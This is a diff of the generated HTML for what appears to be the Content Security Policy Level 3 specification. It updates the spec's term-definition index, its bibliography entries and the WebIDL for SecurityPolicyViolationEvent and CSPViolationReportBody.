-     <li><span class="dfn-paneled" id="term-for-section-3.1" style="color:initial">scheme</span>
-     <li><span class="dfn-paneled" id="term-for-section-4.1" style="color:initial">uri-reference</span>
+     <li><a href="https://tools.ietf.org/html/rfc3986#section-3.2.2">ipv4address</a>
+     <li><a href="https://tools.ietf.org/html/rfc3986#section-3.3">path-absolute</a>
+     <li><a href="https://tools.ietf.org/html/rfc3986#section-3.1">scheme</a>
+     <li><a href="https://tools.ietf.org/html/rfc3986#section-4.1">uri-reference</a>
     </ul>
    <li>
     <a data-link-type="biblio">[rfc4648]</a> defines the following terms:
     <ul>
-     <li><span class="dfn-paneled" id="term-for-section-4" style="color:initial">base64 encoding</span>
-     <li><span class="dfn-paneled" id="term-for-section-5" style="color:initial">base64url encoding</span>
+     <li><a href="https://tools.ietf.org/html/rfc4648#section-4">base64 encoding</a>
+     <li><a href="https://tools.ietf.org/html/rfc4648#section-5">base64url encoding</a>
     </ul>
    <li>
     <a data-link-type="biblio">[RFC5234]</a> defines the following terms:
     <ul>
-     <li><span class="dfn-paneled" id="term-for-appendix-B.1" style="color:initial">alpha</span>
-     <li><span class="dfn-paneled" id="term-for-appendix-B.1①" style="color:initial">digit</span>
-     <li><span class="dfn-paneled" id="term-for-appendix-B.1②" style="color:initial">vchar</span>
+     <li><a href="https://tools.ietf.org/html/rfc5234#appendix-B.1">alpha</a>
+     <li><a href="https://tools.ietf.org/html/rfc5234#appendix-B.1">digit</a>
+     <li><a href="https://tools.ietf.org/html/rfc5234#appendix-B.1">vchar</a>
     </ul>
    <li>
     <a data-link-type="biblio">[RFC7230]</a> defines the following terms:
     <ul>
-     <li><span class="dfn-paneled" id="term-for-section-3.2.3" style="color:initial">ows</span>
-     <li><span class="dfn-paneled" id="term-for-section-3.2.6" style="color:initial">token</span>
+     <li><a href="https://tools.ietf.org/html/rfc7230#section-3.2.3">ows</a>
+     <li><a href="https://tools.ietf.org/html/rfc7230#section-3.2.6">token</a>
     </ul>
    <li>
     <a data-link-type="biblio">[rfc7231]</a> defines the following terms:
     <ul>
-     <li><span class="dfn-paneled" id="term-for-section-3" style="color:initial">representation</span>
-     <li><span class="dfn-paneled" id="term-for-section-3①" style="color:initial">resource representation</span>
+     <li><a href="https://tools.ietf.org/html/rfc7231#section-3">representation</a>
+     <li><a href="https://tools.ietf.org/html/rfc7231#section-3">resource representation</a>
     </ul>
    <li>
     <a data-link-type="biblio">[service-workers-1]</a> defines the following terms:
     <ul>
-     <li><span class="dfn-paneled" id="term-for-serviceworker" style="color:initial">ServiceWorker</span>
-     <li><span class="dfn-paneled" id="term-for-serviceworkerglobalscope" style="color:initial">ServiceWorkerGlobalScope</span>
+     <li><a href="https://w3c.github.io/ServiceWorker/#serviceworker">ServiceWorker</a>
+     <li><a href="https://w3c.github.io/ServiceWorker/#serviceworkerglobalscope">ServiceWorkerGlobalScope</a>
     </ul>
    <li>
     <a data-link-type="biblio">[sha2]</a> defines the following terms:
     <ul>
-     <li><span class="dfn-paneled" id="term-for-①" style="color:initial">sha-256</span>
-     <li><span class="dfn-paneled" id="term-for-②" style="color:initial">sha-384</span>
-     <li><span class="dfn-paneled" id="term-for-③" style="color:initial">sha-512</span>
+     <li><a href="https://nvlpubs.nist.gov/nistpubs/FIPS/NIST.FIPS.180-4.pdf#">sha-256</a>
+     <li><a href="https://nvlpubs.nist.gov/nistpubs/FIPS/NIST.FIPS.180-4.pdf#">sha-384</a>
+     <li><a href="https://nvlpubs.nist.gov/nistpubs/FIPS/NIST.FIPS.180-4.pdf#">sha-512</a>
     </ul>
    <li>
     <a data-link-type="biblio">[URL]</a> defines the following terms:
     <ul>
-     <li><span class="dfn-paneled" id="term-for-url" style="color:initial">URL</span>
-     <li><span class="dfn-paneled" id="term-for-concept-base-url" style="color:initial">base url</span>
-     <li><span class="dfn-paneled" id="term-for-default-port" style="color:initial">default port</span>
-     <li><span class="dfn-paneled" id="term-for-concept-url-host" style="color:initial">host <small>(for url)</small></span>
-     <li><span class="dfn-paneled" id="term-for-concept-ipv6" style="color:initial">ipv6 address</span>
-     <li><span class="dfn-paneled" id="term-for-concept-url-origin" style="color:initial">origin</span>
-     <li><span class="dfn-paneled" id="term-for-concept-url-path" style="color:initial">path</span>
-     <li><span class="dfn-paneled" id="term-for-percent-decode" style="color:initial">percent decode</span>
-     <li><span class="dfn-paneled" id="term-for-concept-url-port" style="color:initial">port <small>(for url)</small></span>
-     <li><span class="dfn-paneled" id="term-for-concept-url-scheme" style="color:initial">scheme</span>
-     <li><span class="dfn-paneled" id="term-for-concept-url-parser" style="color:initial">url parser</span>
-     <li><span class="dfn-paneled" id="term-for-concept-url-serializer" style="color:initial">url serializer</span>
+     <li><a href="https://url.spec.whatwg.org/#url">URL</a>
+     <li><a href="https://url.spec.whatwg.org/#concept-base-url">base url</a>
+     <li><a href="https://url.spec.whatwg.org/#default-port">default port</a>
+     <li><a href="https://url.spec.whatwg.org/#dom-url-host">host <small>(for URL)</small></a>
+     <li><a href="https://url.spec.whatwg.org/#concept-url-host">host <small>(for url)</small></a>
+     <li><a href="https://url.spec.whatwg.org/#concept-ipv6">ipv6 address</a>
+     <li><a href="https://url.spec.whatwg.org/#concept-url-origin">origin</a>
+     <li><a href="https://url.spec.whatwg.org/#concept-url-path">path</a>
+     <li><a href="https://url.spec.whatwg.org/#percent-decode">percent decode</a>
+     <li><a href="https://url.spec.whatwg.org/#dom-url-port">port <small>(for URL)</small></a>
+     <li><a href="https://url.spec.whatwg.org/#concept-url-port">port <small>(for url)</small></a>
+     <li><a href="https://url.spec.whatwg.org/#concept-url-scheme">scheme</a>
+     <li><a href="https://url.spec.whatwg.org/#concept-url-parser">url parser</a>
+     <li><a href="https://url.spec.whatwg.org/#concept-url-serializer">url serializer</a>
     </ul>
    <li>
     <a data-link-type="biblio">[WebIDL]</a> defines the following terms:
     <ul>
-     <li><span class="dfn-paneled" id="term-for-idl-DOMString" style="color:initial">DOMString</span>
-     <li><span class="dfn-paneled" id="term-for-Exposed" style="color:initial">Exposed</span>
-     <li><span class="dfn-paneled" id="term-for-idl-USVString" style="color:initial">USVString</span>
-     <li><span class="dfn-paneled" id="term-for-idl-unsigned-long" style="color:initial">unsigned long</span>
-     <li><span class="dfn-paneled" id="term-for-idl-unsigned-short" style="color:initial">unsigned short</span>
+     <li><a href="https://heycam.github.io/webidl/#idl-DOMString">DOMString</a>
+     <li><a href="https://heycam.github.io/webidl/#Exposed">Exposed</a>
+     <li><a href="https://heycam.github.io/webidl/#idl-USVString">USVString</a>
+     <li><a href="https://heycam.github.io/webidl/#idl-unsigned-long">unsigned long</a>
+     <li><a href="https://heycam.github.io/webidl/#idl-unsigned-short">unsigned short</a>
     </ul>
    <li>
     <a data-link-type="biblio">[worklets-1]</a> defines the following terms:
     <ul>
-     <li><span class="dfn-paneled" id="term-for-workletglobalscope" style="color:initial">WorkletGlobalScope</span>
-     <li><span class="dfn-paneled" id="term-for-workletglobalscope-owner-document" style="color:initial">owner document</span>
+     <li><a href="https://drafts.css-houdini.org/worklets/#workletglobalscope">WorkletGlobalScope</a>
+     <li><a href="https://drafts.css-houdini.org/worklets/#workletglobalscope-owner-document">owner document</a>
     </ul>
   </ul>
   <h2 class="no-num no-ref heading settled" id="references"><span class="content">References</span><a class="self-link" href="#references"></a></h2>
   <h3 class="no-num no-ref heading settled" id="normative"><span class="content">Normative References</span><a class="self-link" href="#normative"></a></h3>
   <dl>
+   <dt id="biblio-csp3">[CSP3]
+   <dd>Mike West. <a href="https://www.w3.org/TR/CSP3/">Content Security Policy Level 3</a>. 13 September 2016. WD. URL: <a href="https://www.w3.org/TR/CSP3/">https://www.w3.org/TR/CSP3/</a>
    <dt id="biblio-css-cascade-4">[CSS-CASCADE-4]
-   <dd>Elika Etemad; Tab Atkins Jr.. <a href="https://www.w3.org/TR/css-cascade-4/">CSS Cascading and Inheritance Level 4</a>. 28 August 2018. CR. URL: <a href="https://www.w3.org/TR/css-cascade-4/">https://www.w3.org/TR/css-cascade-4/</a>
+   <dd>Elika Etemad; Tab Atkins Jr.. <a href="https://www.w3.org/TR/css-cascade-4/">CSS Cascading and Inheritance Level 4</a>. 14 January 2016. CR. URL: <a href="https://www.w3.org/TR/css-cascade-4/">https://www.w3.org/TR/css-cascade-4/</a>
    <dt id="biblio-cssom">[CSSOM]
    <dd>Simon Pieters; Glenn Adams. <a href="https://www.w3.org/TR/cssom-1/">CSS Object Model (CSSOM)</a>. 17 March 2016. WD. URL: <a href="https://www.w3.org/TR/cssom-1/">https://www.w3.org/TR/cssom-1/</a>
    <dt id="biblio-dom">[DOM]
@@ -8125,6 +6363,8 @@ rest of Google’s CSP Cabal.</p>
    <dd>Gordon P. Hemsley. <a href="https://mimesniff.spec.whatwg.org/">MIME Sniffing Standard</a>. Living Standard. URL: <a href="https://mimesniff.spec.whatwg.org/">https://mimesniff.spec.whatwg.org/</a>
    <dt id="biblio-reporting">[REPORTING]
    <dd>Ilya Gregorik; Mike West. <a href="https://wicg.github.io/reporting/">Reporting API</a>. URL: <a href="https://wicg.github.io/reporting/">https://wicg.github.io/reporting/</a>
+   <dt id="biblio-reporting-1">[REPORTING-1]
+   <dd>Ilya Grigorik; Mike West. <a href="https://www.w3.org/TR/reporting-1/">Reporting API 1</a>. 7 June 2016. NOTE. URL: <a href="https://www.w3.org/TR/reporting-1/">https://www.w3.org/TR/reporting-1/</a>
    <dt id="biblio-rfc2045">[RFC2045]
    <dd>N. Freed; N. Borenstein. <a href="https://tools.ietf.org/html/rfc2045">Multipurpose Internet Mail Extensions (MIME) Part One: Format of Internet Message Bodies</a>. November 1996. Draft Standard. URL: <a href="https://tools.ietf.org/html/rfc2045">https://tools.ietf.org/html/rfc2045</a>
    <dt id="biblio-rfc2119">[RFC2119]
@@ -8163,7 +6403,7 @@ rest of Google’s CSP Cabal.</p>
   <h3 class="no-num no-ref heading settled" id="informative"><span class="content">Informative References</span><a class="self-link" href="#informative"></a></h3>
   <dl>
    <dt id="biblio-appmanifest">[APPMANIFEST]
-   <dd>Marcos Caceres; et al. <a href="https://www.w3.org/TR/appmanifest/">Web App Manifest</a>. 6 September 2018. WD. URL: <a href="https://www.w3.org/TR/appmanifest/">https://www.w3.org/TR/appmanifest/</a>
+   <dd>Marcos Caceres; et al. <a href="https://www.w3.org/TR/appmanifest/">Web App Manifest</a>. 4 July 2018. WD. URL: <a href="https://www.w3.org/TR/appmanifest/">https://www.w3.org/TR/appmanifest/</a>
    <dt id="biblio-beacon">[BEACON]
    <dd>Ilya Grigorik; et al. <a href="https://www.w3.org/TR/beacon/">Beacon</a>. 13 April 2017. CR. URL: <a href="https://www.w3.org/TR/beacon/">https://www.w3.org/TR/beacon/</a>
    <dt id="biblio-csp2">[CSP2]
@@ -8194,64 +6434,78 @@ rest of Google’s CSP Cabal.</p>
    <dd>James Clark. <a href="https://www.w3.org/TR/xslt/">XSL Transformations (XSLT) Version 1.0</a>. 16 November 1999. REC. URL: <a href="https://www.w3.org/TR/xslt/">https://www.w3.org/TR/xslt/</a>
   </dl>
   <h2 class="no-num no-ref heading settled" id="idl-index"><span class="content">IDL Index</span><a class="self-link" href="#idl-index"></a></h2>
-<pre class="idl highlight def"><c- b>enum</c-> <a href="#enumdef-securitypolicyviolationeventdisposition"><code><c- g>SecurityPolicyViolationEventDisposition</c-></code></a> {
-  <a href="#dom-securitypolicyviolationeventdisposition-enforce"><code><c- s>"enforce"</c-></code></a>, <a href="#dom-securitypolicyviolationeventdisposition-report"><code><c- s>"report"</c-></code></a>
+<pre class="idl highlight def"><span class="kt">interface</span> <a class="nv" href="#cspviolationreportbody"><code>CSPViolationReportBody</code></a> : <a class="n" data-link-type="idl-name" href="https://w3c.github.io/reporting/#reportbody" id="ref-for-reportbody①">ReportBody</a> {
+  <span class="kt">readonly</span> <span class="kt">attribute</span> <a class="n idl-code" data-link-type="interface" href="https://heycam.github.io/webidl/#idl-USVString" id="ref-for-idl-USVString①④"><span class="kt">USVString</span></a> <a class="nv" data-readonly="" data-type="USVString" href="#dom-cspviolationreportbody-documenturl"><code>documentURL</code></a>;
+  <span class="kt">readonly</span> <span class="kt">attribute</span> <a class="n idl-code" data-link-type="interface" href="https://heycam.github.io/webidl/#idl-USVString" id="ref-for-idl-USVString①⑤"><span class="kt">USVString</span></a>? <a class="nv" data-readonly="" data-type="USVString?" href="#dom-cspviolationreportbody-referrer"><code>referrer</code></a>;
+  <span class="kt">readonly</span> <span class="kt">attribute</span> <a class="n idl-code" data-link-type="interface" href="https://heycam.github.io/webidl/#idl-USVString" id="ref-for-idl-USVString②①"><span class="kt">USVString</span></a>? <a class="nv" data-readonly="" data-type="USVString?" href="#dom-cspviolationreportbody-blockedurl"><code>blockedURL</code></a>;
+  <span class="kt">readonly</span> <span class="kt">attribute</span> <a class="n idl-code" data-link-type="interface" href="https://heycam.github.io/webidl/#idl-DOMString" id="ref-for-idl-DOMString①②"><span class="kt">DOMString</span></a> <a class="nv" data-readonly="" data-type="DOMString" href="#dom-cspviolationreportbody-effectivedirective"><code>effectiveDirective</code></a>;
+  <span class="kt">readonly</span> <span class="kt">attribute</span> <a class="n idl-code" data-link-type="interface" href="https://heycam.github.io/webidl/#idl-DOMString" id="ref-for-idl-DOMString①①"><span class="kt">DOMString</span></a> <a class="nv" data-readonly="" data-type="DOMString" href="#dom-cspviolationreportbody-originalpolicy"><code>originalPolicy</code></a>;
+  <span class="kt">readonly</span> <span class="kt">attribute</span> <a class="n idl-code" data-link-type="interface" href="https://heycam.github.io/webidl/#idl-USVString" id="ref-for-idl-USVString③①"><span class="kt">USVString</span></a>? <a class="nv" data-readonly="" data-type="USVString?" href="#dom-cspviolationreportbody-sourcefile"><code>sourceFile</code></a>;
+  <span class="kt">readonly</span> <span class="kt">attribute</span> <a class="n idl-code" data-link-type="interface" href="https://heycam.github.io/webidl/#idl-DOMString" id="ref-for-idl-DOMString②①"><span class="kt">DOMString</span></a>? <a class="nv" data-readonly="" data-type="DOMString?" href="#dom-cspviolationreportbody-sample"><code>sample</code></a>;
+  <span class="kt">readonly</span> <span class="kt">attribute</span> <a class="n" data-link-type="idl-name" href="#enumdef-securitypolicyviolationeventdisposition" id="ref-for-enumdef-securitypolicyviolationeventdisposition③">SecurityPolicyViolationEventDisposition</a> <a class="nv" data-readonly="" data-type="SecurityPolicyViolationEventDisposition" href="#dom-cspviolationreportbody-disposition"><code>disposition</code></a>;
+  <span class="kt">readonly</span> <span class="kt">attribute</span> <a class="n idl-code" data-link-type="interface" href="https://heycam.github.io/webidl/#idl-unsigned-short" id="ref-for-idl-unsigned-short③"><span class="kt">unsigned</span> <span class="kt">short</span></a> <a class="nv" data-readonly="" data-type="unsigned short" href="#dom-cspviolationreportbody-statuscode"><code>statusCode</code></a>;
+  <span class="kt">readonly</span> <span class="kt">attribute</span> <a class="n idl-code" data-link-type="interface" href="https://heycam.github.io/webidl/#idl-unsigned-long" id="ref-for-idl-unsigned-long⑧"><span class="kt">unsigned</span> <span class="kt">long</span></a>? <a class="nv" data-readonly="" data-type="unsigned long?" href="#dom-cspviolationreportbody-linenumber"><code>lineNumber</code></a>;
+  <span class="kt">readonly</span> <span class="kt">attribute</span> <a class="n idl-code" data-link-type="interface" href="https://heycam.github.io/webidl/#idl-unsigned-long" id="ref-for-idl-unsigned-long①①"><span class="kt">unsigned</span> <span class="kt">long</span></a>? <a class="nv" data-readonly="" data-type="unsigned long?" href="#dom-cspviolationreportbody-columnnumber"><code>columnNumber</code></a>;
 };
 
-[<a href="#dom-securitypolicyviolationevent-securitypolicyviolationevent"><code><c- g>Constructor</c-></code></a>(<a class="idl-code" data-link-type="interface" href="https://heycam.github.io/webidl/#idl-DOMString" id="ref-for-idl-DOMString⑧"><c- b>DOMString</c-></a> <a href="#dom-securitypolicyviolationevent-securitypolicyviolationevent-type-eventinitdict-type"><code><c- g>type</c-></code></a>, <c- b>optional</c-> <a class="n" data-link-type="idl-name" href="#dictdef-securitypolicyviolationeventinit" id="ref-for-dictdef-securitypolicyviolationeventinit①"><c- n>SecurityPolicyViolationEventInit</c-></a> <a href="#dom-securitypolicyviolationevent-securitypolicyviolationevent-type-eventinitdict-eventinitdict"><code><c- g>eventInitDict</c-></code></a>),
- <a class="idl-code" data-link-type="extended-attribute" href="https://heycam.github.io/webidl/#Exposed" id="ref-for-Exposed①"><c- g>Exposed</c-></a>=(<c- n>Window</c->,<c- n>Worker</c->)]
-<c- b>interface</c-> <a href="#securitypolicyviolationevent"><code><c- g>SecurityPolicyViolationEvent</c-></code></a> : <a class="n" data-link-type="idl-name" href="https://dom.spec.whatwg.org/#event" id="ref-for-event①"><c- n>Event</c-></a> {
-    <c- b>readonly</c->    <c- b>attribute</c-> <a class="idl-code" data-link-type="interface" href="https://heycam.github.io/webidl/#idl-USVString" id="ref-for-idl-USVString①⓪"><c- b>USVString</c-></a>      <a data-readonly data-type="USVString" href="#dom-securitypolicyviolationevent-documenturl"><code><c- g>documentURL</c-></code></a>;
-    <c- b>readonly</c->    <c- b>attribute</c-> <a class="idl-code" data-link-type="interface" href="https://heycam.github.io/webidl/#idl-USVString" id="ref-for-idl-USVString①①"><c- b>USVString</c-></a>      <a class="idl-code" data-link-type="attribute" data-readonly data-type="USVString" href="#dom-securitypolicyviolationevent-documenturi" id="ref-for-dom-securitypolicyviolationevent-documenturi①"><c- g>documentURI</c-></a>; // historical alias of documentURL
-    <c- b>readonly</c->    <c- b>attribute</c-> <a class="idl-code" data-link-type="interface" href="https://heycam.github.io/webidl/#idl-USVString" id="ref-for-idl-USVString②①"><c- b>USVString</c-></a>      <a data-readonly data-type="USVString" href="#dom-securitypolicyviolationevent-referrer"><code><c- g>referrer</c-></code></a>;
-    <c- b>readonly</c->    <c- b>attribute</c-> <a class="idl-code" data-link-type="interface" href="https://heycam.github.io/webidl/#idl-USVString" id="ref-for-idl-USVString③①"><c- b>USVString</c-></a>      <a data-readonly data-type="USVString" href="#dom-securitypolicyviolationevent-blockedurl"><code><c- g>blockedURL</c-></code></a>;
-    <c- b>readonly</c->    <c- b>attribute</c-> <a class="idl-code" data-link-type="interface" href="https://heycam.github.io/webidl/#idl-USVString" id="ref-for-idl-USVString④①"><c- b>USVString</c-></a>      <a class="idl-code" data-link-type="attribute" data-readonly data-type="USVString" href="#dom-securitypolicyviolationevent-blockeduri" id="ref-for-dom-securitypolicyviolationevent-blockeduri①"><c- g>blockedURI</c-></a>; // historical alias of blockedURL
-    <c- b>readonly</c->    <c- b>attribute</c-> <a class="idl-code" data-link-type="interface" href="https://heycam.github.io/webidl/#idl-DOMString" id="ref-for-idl-DOMString①①"><c- b>DOMString</c-></a>      <a data-readonly data-type="DOMString" href="#dom-securitypolicyviolationevent-effectivedirective"><code><c- g>effectiveDirective</c-></code></a>;
-    <c- b>readonly</c->    <c- b>attribute</c-> <a class="idl-code" data-link-type="interface" href="https://heycam.github.io/webidl/#idl-DOMString" id="ref-for-idl-DOMString②①"><c- b>DOMString</c-></a>      <a class="idl-code" data-link-type="attribute" data-readonly data-type="DOMString" href="#dom-securitypolicyviolationevent-violateddirective" id="ref-for-dom-securitypolicyviolationevent-violateddirective①"><c- g>violatedDirective</c-></a>; // historical alias of effectiveDirective
-    <c- b>readonly</c->    <c- b>attribute</c-> <a class="idl-code" data-link-type="interface" href="https://heycam.github.io/webidl/#idl-DOMString" id="ref-for-idl-DOMString③①"><c- b>DOMString</c-></a>      <a data-readonly data-type="DOMString" href="#dom-securitypolicyviolationevent-originalpolicy"><code><c- g>originalPolicy</c-></code></a>;
-    <c- b>readonly</c->    <c- b>attribute</c-> <a class="idl-code" data-link-type="interface" href="https://heycam.github.io/webidl/#idl-USVString" id="ref-for-idl-USVString⑤①"><c- b>USVString</c-></a>      <a data-readonly data-type="USVString" href="#dom-securitypolicyviolationevent-sourcefile"><code><c- g>sourceFile</c-></code></a>;
-    <c- b>readonly</c->    <c- b>attribute</c-> <a class="idl-code" data-link-type="interface" href="https://heycam.github.io/webidl/#idl-DOMString" id="ref-for-idl-DOMString④①"><c- b>DOMString</c-></a>      <a data-readonly data-type="DOMString" href="#dom-securitypolicyviolationevent-sample"><code><c- g>sample</c-></code></a>;
-    <c- b>readonly</c->    <c- b>attribute</c-> <a class="n" data-link-type="idl-name" href="#enumdef-securitypolicyviolationeventdisposition" id="ref-for-enumdef-securitypolicyviolationeventdisposition②"><c- n>SecurityPolicyViolationEventDisposition</c-></a>      <a data-readonly data-type="SecurityPolicyViolationEventDisposition" href="#dom-securitypolicyviolationevent-disposition"><code><c- g>disposition</c-></code></a>;
-    <c- b>readonly</c->    <c- b>attribute</c-> <a class="idl-code" data-link-type="interface" href="https://heycam.github.io/webidl/#idl-unsigned-short" id="ref-for-idl-unsigned-short②"><c- b>unsigned</c-> <c- b>short</c-></a> <a data-readonly data-type="unsigned short" href="#dom-securitypolicyviolationevent-statuscode"><code><c- g>statusCode</c-></code></a>;
-    <c- b>readonly</c->    <c- b>attribute</c-> <a class="idl-code" data-link-type="interface" href="https://heycam.github.io/webidl/#idl-unsigned-long" id="ref-for-idl-unsigned-long⑥"><c- b>unsigned</c-> <c- b>long</c-></a>  <a data-readonly data-type="unsigned long" href="#dom-securitypolicyviolationevent-lineno"><code><c- g>lineno</c-></code></a>;
-    <c- b>readonly</c->    <c- b>attribute</c-> <a class="idl-code" data-link-type="interface" href="https://heycam.github.io/webidl/#idl-unsigned-long" id="ref-for-idl-unsigned-long①①"><c- b>unsigned</c-> <c- b>long</c-></a>  <a class="idl-code" data-link-type="attribute" data-readonly data-type="unsigned long" href="#dom-securitypolicyviolationevent-linenumber" id="ref-for-dom-securitypolicyviolationevent-linenumber①"><c- g>lineNumber</c-></a>; // historical alias of lineno
-    <c- b>readonly</c->    <c- b>attribute</c-> <a class="idl-code" data-link-type="interface" href="https://heycam.github.io/webidl/#idl-unsigned-long" id="ref-for-idl-unsigned-long②①"><c- b>unsigned</c-> <c- b>long</c-></a>  <a data-readonly data-type="unsigned long" href="#dom-securitypolicyviolationevent-colno"><code><c- g>colno</c-></code></a>;
-    <c- b>readonly</c->    <c- b>attribute</c-> <a class="idl-code" data-link-type="interface" href="https://heycam.github.io/webidl/#idl-unsigned-long" id="ref-for-idl-unsigned-long③①"><c- b>unsigned</c-> <c- b>long</c-></a>  <a class="idl-code" data-link-type="attribute" data-readonly data-type="unsigned long" href="#dom-securitypolicyviolationevent-columnnumber" id="ref-for-dom-securitypolicyviolationevent-columnnumber①"><c- g>columnNumber</c-></a>; // historical alias of colno
+<span class="kt">enum</span> <a class="nv" href="#enumdef-securitypolicyviolationeventdisposition"><code>SecurityPolicyViolationEventDisposition</code></a> {
+  <a class="s" href="#dom-securitypolicyviolationeventdisposition-enforce"><code>"enforce"</code></a>, <a class="s" href="#dom-securitypolicyviolationeventdisposition-report"><code>"report"</code></a>
 };
 
-<c- b>dictionary</c-> <a href="#dictdef-securitypolicyviolationeventinit"><code><c- g>SecurityPolicyViolationEventInit</c-></code></a> : <a class="n" data-link-type="idl-name" href="https://dom.spec.whatwg.org/#dictdef-eventinit" id="ref-for-dictdef-eventinit①"><c- n>EventInit</c-></a> {
-    <c- b>required</c-> <a class="idl-code" data-link-type="interface" href="https://heycam.github.io/webidl/#idl-USVString" id="ref-for-idl-USVString⑥①"><c- b>USVString</c-></a>      <a data-type="USVString      " href="#dom-securitypolicyviolationeventinit-documenturl"><code><c- g>documentURL</c-></code></a>;
-             <a class="idl-code" data-link-type="interface" href="https://heycam.github.io/webidl/#idl-USVString" id="ref-for-idl-USVString⑦①"><c- b>USVString</c-></a>      <a data-default="&quot;&quot;" data-type="USVString      " href="#dom-securitypolicyviolationeventinit-referrer"><code><c- g>referrer</c-></code></a> = "";
-             <a class="idl-code" data-link-type="interface" href="https://heycam.github.io/webidl/#idl-USVString" id="ref-for-idl-USVString⑧①"><c- b>USVString</c-></a>      <a data-default="&quot;&quot;" data-type="USVString      " href="#dom-securitypolicyviolationeventinit-blockedurl"><code><c- g>blockedURL</c-></code></a> = "";
-    <c- b>required</c-> <a class="idl-code" data-link-type="interface" href="https://heycam.github.io/webidl/#idl-DOMString" id="ref-for-idl-DOMString⑤①"><c- b>DOMString</c-></a>      <a data-type="DOMString      " href="#dom-securitypolicyviolationeventinit-effectivedirective"><code><c- g>effectiveDirective</c-></code></a>;
-    <c- b>required</c-> <a class="idl-code" data-link-type="interface" href="https://heycam.github.io/webidl/#idl-DOMString" id="ref-for-idl-DOMString⑥①"><c- b>DOMString</c-></a>      <a data-type="DOMString      " href="#dom-securitypolicyviolationeventinit-originalpolicy"><code><c- g>originalPolicy</c-></code></a>;
-             <a class="idl-code" data-link-type="interface" href="https://heycam.github.io/webidl/#idl-USVString" id="ref-for-idl-USVString⑨①"><c- b>USVString</c-></a>      <a data-default="&quot;&quot;" data-type="USVString      " href="#dom-securitypolicyviolationeventinit-sourcefile"><code><c- g>sourceFile</c-></code></a> = "";
-             <a class="idl-code" data-link-type="interface" href="https://heycam.github.io/webidl/#idl-DOMString" id="ref-for-idl-DOMString⑦①"><c- b>DOMString</c-></a>      <a data-default="&quot;&quot;" data-type="DOMString      " href="#dom-securitypolicyviolationeventinit-sample"><code><c- g>sample</c-></code></a> = "";
-    <c- b>required</c-> <a class="n" data-link-type="idl-name" href="#enumdef-securitypolicyviolationeventdisposition" id="ref-for-enumdef-securitypolicyviolationeventdisposition①①"><c- n>SecurityPolicyViolationEventDisposition</c-></a> <a data-type="SecurityPolicyViolationEventDisposition " href="#dom-securitypolicyviolationeventinit-disposition"><code><c- g>disposition</c-></code></a>;
-    <c- b>required</c-> <a class="idl-code" data-link-type="interface" href="https://heycam.github.io/webidl/#idl-unsigned-short" id="ref-for-idl-unsigned-short①①"><c- b>unsigned</c-> <c- b>short</c-></a> <a data-type="unsigned short " href="#dom-securitypolicyviolationeventinit-statuscode"><code><c- g>statusCode</c-></code></a>;
-             <a class="idl-code" data-link-type="interface" href="https://heycam.github.io/webidl/#idl-unsigned-long" id="ref-for-idl-unsigned-long④①"><c- b>unsigned</c-> <c- b>long</c-></a>  <a data-default="0" data-type="unsigned long  " href="#dom-securitypolicyviolationeventinit-lineno"><code><c- g>lineno</c-></code></a> = 0;
-             <a class="idl-code" data-link-type="interface" href="https://heycam.github.io/webidl/#idl-unsigned-long" id="ref-for-idl-unsigned-long⑤①"><c- b>unsigned</c-> <c- b>long</c-></a>  <a data-default="0" data-type="unsigned long  " href="#dom-securitypolicyviolationeventinit-colno"><code><c- g>colno</c-></code></a> = 0;
+[<a class="nv" href="#dom-securitypolicyviolationevent-securitypolicyviolationevent"><code>Constructor</code></a>(<a class="n idl-code" data-link-type="interface" href="https://heycam.github.io/webidl/#idl-DOMString" id="ref-for-idl-DOMString③①"><span class="kt">DOMString</span></a> <a class="nv" href="#dom-securitypolicyviolationevent-securitypolicyviolationevent-type-eventinitdict-type"><code>type</code></a>, <span class="kt">optional</span> <a class="n" data-link-type="idl-name" href="#dictdef-securitypolicyviolationeventinit" id="ref-for-dictdef-securitypolicyviolationeventinit①">SecurityPolicyViolationEventInit</a> <a class="nv" href="#dom-securitypolicyviolationevent-securitypolicyviolationevent-type-eventinitdict-eventinitdict"><code>eventInitDict</code></a>),
+ <a class="nv idl-code" data-link-type="extended-attribute" href="https://heycam.github.io/webidl/#Exposed" id="ref-for-Exposed①">Exposed</a>=(<span class="n">Window</span>,<span class="n">Worker</span>)]
+<span class="kt">interface</span> <a class="nv" href="#securitypolicyviolationevent"><code>SecurityPolicyViolationEvent</code></a> : <a class="n" data-link-type="idl-name" href="https://dom.spec.whatwg.org/#event" id="ref-for-event①">Event</a> {
+    <span class="kt">readonly</span>    <span class="kt">attribute</span> <a class="n idl-code" data-link-type="interface" href="https://heycam.github.io/webidl/#idl-USVString" id="ref-for-idl-USVString④①"><span class="kt">USVString</span></a>      <a class="nv" data-readonly="" data-type="USVString" href="#dom-securitypolicyviolationevent-documenturl"><code>documentURL</code></a>;
+    <span class="kt">readonly</span>    <span class="kt">attribute</span> <a class="n idl-code" data-link-type="interface" href="https://heycam.github.io/webidl/#idl-USVString" id="ref-for-idl-USVString⑤①"><span class="kt">USVString</span></a>      <a class="nv idl-code" data-link-type="attribute" data-readonly="" data-type="USVString" href="#dom-securitypolicyviolationevent-documenturi" id="ref-for-dom-securitypolicyviolationevent-documenturi①">documentURI</a>; // historical alias of documentURL
+    <span class="kt">readonly</span>    <span class="kt">attribute</span> <a class="n idl-code" data-link-type="interface" href="https://heycam.github.io/webidl/#idl-USVString" id="ref-for-idl-USVString⑥①"><span class="kt">USVString</span></a>      <a class="nv" data-readonly="" data-type="USVString" href="#dom-securitypolicyviolationevent-referrer"><code>referrer</code></a>;
+    <span class="kt">readonly</span>    <span class="kt">attribute</span> <a class="n idl-code" data-link-type="interface" href="https://heycam.github.io/webidl/#idl-USVString" id="ref-for-idl-USVString⑦①"><span class="kt">USVString</span></a>      <a class="nv" data-readonly="" data-type="USVString" href="#dom-securitypolicyviolationevent-blockedurl"><code>blockedURL</code></a>;
+    <span class="kt">readonly</span>    <span class="kt">attribute</span> <a class="n idl-code" data-link-type="interface" href="https://heycam.github.io/webidl/#idl-USVString" id="ref-for-idl-USVString⑧①"><span class="kt">USVString</span></a>      <a class="nv idl-code" data-link-type="attribute" data-readonly="" data-type="USVString" href="#dom-securitypolicyviolationevent-blockeduri" id="ref-for-dom-securitypolicyviolationevent-blockeduri①">blockedURI</a>; // historical alias of blockedURL
